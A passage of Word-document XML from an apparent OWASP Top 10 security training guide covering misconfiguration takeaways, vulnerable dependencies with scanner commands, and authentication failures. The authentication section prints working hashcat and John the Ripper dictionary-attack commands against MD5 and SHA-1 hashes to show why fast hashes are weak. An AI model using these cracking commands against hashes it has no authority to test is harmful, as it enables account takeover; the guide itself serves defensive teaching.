    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Configure detailed error messages for development only; show generic messages in production</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Remove or secure all default accounts and change default passwords</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Automate configuration checks in your CI/CD pipeline using tools like Checkov, KICS, or AWS Config</w:t>
      </w:r>
    </w:p>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A05 Key Takeaways</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">1. Disable XML external entity (XXE) processing in all XML parsers</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">2. Never expose stack traces or detailed error messages to end users</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">3. Remove default credentials and disable unused features before deployment</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">4. Maintain a hardening baseline and verify it in your deployment pipeline</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">5. Set all security headers (HSTS, CSP, X-Frame-Options, X-Content-Type-Options)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">A06:2021 — Vulnerable and Outdated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Widespread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system compromise possible</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Modern web applications are built on a foundation of third-party libraries, frameworks, and components. If any of these contain known vulnerabilities, your entire application may be at risk. The notorious Log4Shell vulnerability (CVE-2021-44228) affected millions of systems worldwide because of a single vulnerable logging library.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">The Problem</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Applications typically depend on dozens or hundreds of third-party packages</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Transitive (indirect) dependencies are often not audited</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Security patches may not be applied promptly due to compatibility concerns</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">End-of-life components no longer receive security updates</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Developers may not know which components are in use or their versions</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Tools for Dependency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npm audit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into npm; scans Node.js dependencies against known CVEs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OWASP Dependency-Check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Java, .NET, Python, PHP and others against NVD database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Snyk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monitoring; integrates with GitHub, GitLab, CI/CD pipelines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Trivy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and filesystem scanner; great for Docker images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Dependabot (GitHub)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pull requests for dependency updates with security advisories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Safety (Python)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Python packages against a database of known vulnerabilities</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>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Maintain an inventory of all components and their versions (Software Bill of Materials — SBOM)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Subscribe to security advisories for components you use (CVE feeds, vendor bulletins)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Remove unused dependencies from your codebase</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Only obtain components from official sources with package signing verification</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Integrate automated dependency scanning into your CI/CD pipeline</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Set up automated alerts and PRs for vulnerable dependency updates (Dependabot)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Dependency scanning commands</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="111111"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"># Node.js — check for vulnerabilities</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="111111"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">npm audit</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="111111"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">npm audit fix         # auto-fix non-breaking updates</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Python — check for vulnerabilities</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="111111"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">pip install safety</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="111111"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">safety check</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Java (Maven) — OWASP dependency check</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="111111"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">mvn org.owasp:dependency-check-maven:check</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Docker image scanning</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="111111"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">trivy image my-app:latest</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>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A06 Key Takeaways</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">1. Know what's in your dependency tree — use a Software Bill of Materials (SBOM)</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">2. Run dependency scanners (npm audit, Snyk, OWASP Dependency-Check) in CI/CD</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">3. Keep dependencies up to date; automate updates with Dependabot or Renovate</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">4. Remove unused libraries — every dependency is a potential attack surface</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">5. Monitor CVE feeds for critical vulnerabilities in your tech stack</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">A07:2021 — Identification and Authentication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takeover / Full system access</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Weaknesses in authentication and session management allow attackers to impersonate users, compromise passwords, hijack sessions, or bypass authentication entirely. This category covers password attacks, weak session management, missing multi-factor authentication (MFA), and JWT vulnerabilities.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Password-Based Attacks</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Credential Stuffing</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Attackers use lists of username/password pairs from previous data breaches (available on the dark web) and automatically try them against your application. Since many users reuse passwords, this is highly effective.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Brute Force and Dictionary Attacks</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Without rate limiting or account lockout policies, attackers can systematically try password combinations. Tools like Hashcat can test billions of combinations per second against offline password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Password cracking tools and cost comparison</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="111111"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"># Hashcat — dictionary attack against MD5 hashes</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="111111"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">hashcat -a 0 -m 0 hashes.txt rockyou.txt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John the Ripper — crack SHA-1 hashes</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="111111"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">john --format=raw-sha1 --wordlist=rockyou.txt hashes.txt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Why MD5/SHA-1 are dangerous for passwords:</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="111111"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"># MD5 can compute ~10 BILLION hashes/second on a gaming GPU</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="111111"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"># bcrypt (cost 12) computes ~200 hashes/second on the same GPU</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="111111"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"># 50 million times harder to crack!</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Insecure Session Management</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Session tokens must be unpredictable, properly invalidated on logout, and transmitted securely. Common mistakes include:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Short or sequential session IDs that can be guessed</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Session tokens transmitted over HTTP (not HTTPS)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Sessions not invalidated on logout or after password change</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Long-lived sessions without re-authentication for sensitive operations</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">JWT Security Issues (Authentication Context)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Beyond access control, JWT authentication failures include:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Tokens not expiring (missing exp claim or exp set far in the future)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Token expiry errors logged with the token value itself — creating information disclosure</w:t>
